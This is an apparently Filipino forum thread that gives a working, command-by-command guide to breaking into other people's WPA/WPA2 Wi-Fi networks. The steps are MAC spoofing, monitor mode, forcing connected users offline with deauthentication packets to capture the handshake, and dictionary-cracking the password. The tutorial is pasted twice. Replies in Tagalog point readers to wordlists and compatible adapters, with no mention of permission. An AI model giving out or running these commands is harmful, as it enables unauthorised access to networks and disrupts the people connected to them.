🔒 Closed häçk wifi using backtrack

Status
Not open for further replies.
Backtrack is now Kali Linux download it when you get some free time.

Pre-Requisites:
  1. Kali / back track Linux which will by default have all the tools required to dow what you want.
  2. A Virtual Machine or a Laptop you can use to boot the BT or Kali
  3. A compatible network card, The network card should support packet injection if you want to do it fast else you will have to wait some time for someone disconnect and connect back to the access point.

Important Phrases To Know:


MAC Address(Media Access Control Address) is a unique identifier assigned to network interfaces for communications on the physical network segment.

WAP(Wireless Access Point) is a device that allows wireless devices to connect to a wired network using Wi-Fi

BSSID(Basic Service Set Identification) is the MAC address of the WAP

ESSID(Extended Service Set Identification) is the display name of the wireless network

WPA/WPA2(Wi-Fi Protected Access / Wi-Fi Protected Access II)are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks.

PSK(Pre-Shared Key) is the term for the password defined in WPA/WPA2 encrypted networks.


STEP 1: Changing Your MAC Address :
  1. In Kali/BT open the terminal.
  2. command : ifconfig
  3. This should list all network adapters on your system including your wireless one which should be named something like: Wlanx { wlan0, wlan1 ....}
  4. Turn off your network card using the command : ifconfig wlan0 down
    Note: change wlan0 to what ever it said in previous command.
  5. command : macchanger -m 00:11:22:33:44:55
    This will change your MAC address of your device temporarily
  6. Turn the device back on : ifconfig wlan0 up

STEP 2: Create a virtual monitoring inteterface.
In order to listen to the signals that wlan0 is handling we will create a virtual interface that will help us to monitor and handle what wlan0 is sending and receiving.

  1. Command : airmon-ng start wlan0
  2. This will create a new monitor interface called mon0

STEP 3 : Start the attack by monitoring the wireless traffic

  1. Command : airodump-ng mon0
    this will list down all active AP and their BSSID and other details. Also below the list you will see the list f computer stations connected to any of these APs.
  2. Note down the BSSID and channel it is using (CH in the output) of the AP you want to hit
  3. Hit Ctrl+c to end the monitoring.


STEP 4: Lock onto the needed AP.
This will target the communication from just the accespoint you want and start writing don't collected information into a file you need to häçk.

What we are hoping to capture is the 4way handshake data that the systems use to authenticate, this data can then be used to ©râck the password used.

  1. Command : airodump-ng --bssid <bssid of AP> -c 4 -w dumpfilenamemon0
    The underlined parts need to be changed as per the data you have. dumpfilename can be replaced with anyhting.
  2. This will start monitoring the Accesspoint and showing you the stations connected to it too. You need to write down the BSSID of any one of the stations so that you can trick it to disconnect and reconnect.

STEP 5 : Capturing Authentication Packets
Note: This will only work if your network card is packet injection compatible else you will have to wait till the the person disconnect and reconnects himself.

  1. Open new terminal and give command :
    aireplay-ng -0 30 -a <BSSID of Station Connected> mon0
    This will send 30 disconnect requests to the computer causing it to try and reconnect to the accesspoint.
  2. If it shows some error or does not seem to work it is probably the issue with the network card and you will need to wait till the user reconnects by himself.
  3. Once the reconnection happens you can see it in the Airmon terminal which is monitoring the packets. A alert should be shown ton the top right corner.
    Hit ctrl+c and exit it. Time to ©râck the password.

STEP 6: ©râcking the password
  1. You need a password list file which can be downloaded from the internet. Just search for "wordlist" or "password list" you can get files with millions of words and some as big as 1GB to 10Gb. More the words in it the better.
  2. Get and extract the word list file to your home folder.
  3. Run the command :
    air©râck-ng -w wordlist.lst -b <AP BSSID>dumpfilename*.cap
  4. Replace the underlined with the the right details.

STEP 7: Wait

  1. Wait some time as your computer does the dirty work of ©râcking the password. You should have the password on your screen soon.



häçk Wi-Fi WPA/WPA2 Password
Hello everybody, this is today i'm gonna show you how to häçk any wi-fi passwords using backtrack 5

What We Need to häçk Wi-fi Password?

1) Backtrack 5 [ R1 or R2 or R3, any one of this versions ]

2) Compatible Wi-fi Card

So Let's Start... 1st open Terminal and Then Follow My Steps :

1) In Terminal type : airmon-ng there we can see interfaces.

2) Then type : airmon-ng start wlan0 It must found processes.

3) then we type : airodump-ng mon0 it will start scanning wi-fi networks.

4) copy bssid and type : airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0

5) type : aireplay-ng -0 5 -a (bssid) mon0

6) click on places home folder drag in terminal wpa-01.cap in terminal and type : air©râck-ng (file Directory) or drag file in
terminal

7
tama nga laht ng paliwanag pero hindi padin gagana yan ng 100% marami na akong sinubukan na paghahäçk... maari ka lng makapaghäçk ng password 2-10hours un lng ang kaya kong gawin gamit ang android salamat po. nkabuo ako ng idea sa pinost mo thanks sana makadiscover kapa ng easy way yan kasi ang hinahanap ko yung shortcut at sure na paraan.
 
Sa mga gustong sumubok ng Backtrack or Kali - ok yan parehas basta na-install ng maayos sa pc nyo. OS lang naman mga yan bundled with some strong pentest tools. Aside from the simple working guide by our thread starter, mag-research din kayo sa iba pang tips, tutorials at requirements tulad ng right network adapter, atbp. para maging successful ang project nyo. Maraming murang net adapters sa cdrking na compatible para sa wifi häçking nyo.
Ang latest shared wordlist na alam ko ay nandito (You do not have permission to view the full content of this post. Log in or register now.:
You do not have permission to view the full content of this post. Log in or register now.
Good luck na lang po.
 
Backtrack is now Kali Linux download it when you get some free time.

Pre-Requisites:
  1. Kali / back track Linux which will by default have all the tools required to dow what you want.
  2. A Virtual Machine or a Laptop you can use to boot the BT or Kali
  3. A compatible network card, The network card should support packet injection if you want to do it fast else you will have to wait some time for someone disconnect and connect back to the access point.

Important Phrases To Know:


MAC Address(Media Access Control Address) is a unique identifier assigned to network interfaces for communications on the physical network segment.

WAP(Wireless Access Point) is a device that allows wireless devices to connect to a wired network using Wi-Fi

BSSID(Basic Service Set Identification) is the MAC address of the WAP

ESSID(Extended Service Set Identification) is the display name of the wireless network

WPA/WPA2(Wi-Fi Protected Access / Wi-Fi Protected Access II)are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks.

PSK(Pre-Shared Key) is the term for the password defined in WPA/WPA2 encrypted networks.


STEP 1: Changing Your MAC Address :
  1. In Kali/BT open the terminal.
  2. command : ifconfig
  3. This should list all network adapters on your system including your wireless one which should be named something like: Wlanx { wlan0, wlan1 ....}
  4. Turn off your network card using the command : ifconfig wlan0 down
    Note: change wlan0 to what ever it said in previous command.
  5. command : macchanger -m 00:11:22:33:44:55
    This will change your MAC address of your device temporarily
  6. Turn the device back on : ifconfig wlan0 up

STEP 2: Create a virtual monitoring inteterface.
In order to listen to the signals that wlan0 is handling we will create a virtual interface that will help us to monitor and handle what wlan0 is sending and receiving.

  1. Command : airmon-ng start wlan0
  2. This will create a new monitor interface called mon0

STEP 3 : Start the attack by monitoring the wireless traffic

  1. Command : airodump-ng mon0
    this will list down all active AP and their BSSID and other details. Also below the list you will see the list f computer stations connected to any of these APs.
  2. Note down the BSSID and channel it is using (CH in the output) of the AP you want to hit
  3. Hit Ctrl+c to end the monitoring.


STEP 4: Lock onto the needed AP.
This will target the communication from just the accespoint you want and start writing don't collected information into a file you need to häçk.

What we are hoping to capture is the 4way handshake data that the systems use to authenticate, this data can then be used to ©râck the password used.

  1. Command : airodump-ng --bssid <bssid of AP> -c 4 -w dumpfilenamemon0
    The underlined parts need to be changed as per the data you have. dumpfilename can be replaced with anyhting.
  2. This will start monitoring the Accesspoint and showing you the stations connected to it too. You need to write down the BSSID of any one of the stations so that you can trick it to disconnect and reconnect.

STEP 5 : Capturing Authentication Packets
Note: This will only work if your network card is packet injection compatible else you will have to wait till the the person disconnect and reconnects himself.

  1. Open new terminal and give command :
    aireplay-ng -0 30 -a <BSSID of Station Connected> mon0
    This will send 30 disconnect requests to the computer causing it to try and reconnect to the accesspoint.
  2. If it shows some error or does not seem to work it is probably the issue with the network card and you will need to wait till the user reconnects by himself.
  3. Once the reconnection happens you can see it in the Airmon terminal which is monitoring the packets. A alert should be shown ton the top right corner.
    Hit ctrl+c and exit it. Time to ©râck the password.

STEP 6: ©râcking the password
  1. You need a password list file which can be downloaded from the internet. Just search for "wordlist" or "password list" you can get files with millions of words and some as big as 1GB to 10Gb. More the words in it the better.
  2. Get and extract the word list file to your home folder.
  3. Run the command :
    air©râck-ng -w wordlist.lst -b <AP BSSID>dumpfilename*.cap
  4. Replace the underlined with the the right details.

STEP 7: Wait

  1. Wait some time as your computer does the dirty work of ©râcking the password. You should have the password on your screen soon.



häçk Wi-Fi WPA/WPA2 Password
Hello everybody, this is today i'm gonna show you how to häçk any wi-fi passwords using backtrack 5

What We Need to häçk Wi-fi Password?

1) Backtrack 5 [ R1 or R2 or R3, any one of this versions ]

2) Compatible Wi-fi Card

So Let's Start... 1st open Terminal and Then Follow My Steps :

1) In Terminal type : airmon-ng there we can see interfaces.

2) Then type : airmon-ng start wlan0 It must found processes.

3) then we type : airodump-ng mon0 it will start scanning wi-fi networks.

4) copy bssid and type : airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0

5) type : aireplay-ng -0 5 -a (bssid) mon0

6) click on places home folder drag in terminal wpa-01.cap in terminal and type : air©râck-ng (file Directory) or drag file in
terminal

7) type in terminal : air©râck-ng (filename)*.cap -w (dictionary location) And Hit Enter!

Success! share this 100% working trick with your friends


Hello jeans pwdi po ba ma download ang backtrack 5 sa iPad or iPhone 5.?pano po?kailamgan pa bang rooted ang iPad mo para ma download?
 
Status
Not open for further replies.

About this Thread

  • 37
    Replies
  • 4K
    Views
  • 18
    Participants
Last reply from:
Rabbi

Online now

Members online
1,088
Guests online
19,186
Total visitors
20,274

Forum statistics

Threads
2,289,101
Posts
29,056,267
Members
1,213,544
Latest member
jhunaidpundogar
Back
Top